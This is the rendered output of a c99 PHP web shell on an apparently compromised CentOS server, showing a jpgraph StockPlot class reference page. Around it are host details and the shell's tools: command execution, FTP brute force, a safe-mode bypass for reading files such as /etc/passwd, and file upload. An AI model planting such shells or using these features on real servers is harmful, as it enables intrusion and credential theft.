!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     StockPlot.html (8.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS StockPlot EXTENDS Plot
(Defined in: jpgraph_stock.php : 16)
 StockPlot  Plot 
 HideEndLines() 
 SetColor() 
 SetWidth() 
 StockPlot() 
 HideLegend() 
 SetCenter() 
SetColor() 
 SetCSIMTargets() 
 SetLegend() 
 SetLineWeight() 
 

Class usage and Overview
Create a stock chart graph, aka Candle-chart, aka Box-graph. Each data point is represented by four values (open,close,min,max)

 


Class Methods

 

 

Show horizontal mark lines at the end of min/max lines

ArgumentDefaultDescription
$aHide true Flag true=show end lines

Description
Show horizontal mark lines at the end of min/max lines. This is enabled by default. 

Example

$stock->HideEndLines();

 

 

Specify colors for the stock plot

ArgumentDefaultDescription
$aColor  Line color for positive bars
$aColor1 'white' Fill color for positive bars
$aColor2 'darkred' Line color for negative bars
$aColor3 'darkred' Fill color for negative bars

Description
Specify the colros for a stock chart. A positive bar is defined as a bar where close > open. A negative bar is defined as a bar where close < open. The positive line color is always used for the min/max lines. By default positve colors are black and white. Negative colors are 'red' and 'red'.  

Example

$stockplot->SetColor('black','white','red','red');

 

 

Specify width for stock bars in pixels

ArgumentDefaultDescription
$aWidth  Width in pixels

Description
Specify width for stock bars in pixels 

Example

$stockplot->SetWidth(8);

 

 

Constructor for Stock plots

ArgumentDefaultDescription
&$datay  Y data array
$datax false X data array

Description
Create a new Stock data plot. Each data value consists of 4 data points. (open,close,min,max) If the $ydata isn't an even number of data quadruples an error message will result. 

Example

$ydata = array( .... )
$stockplot = new StockPlot($ydata);



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]--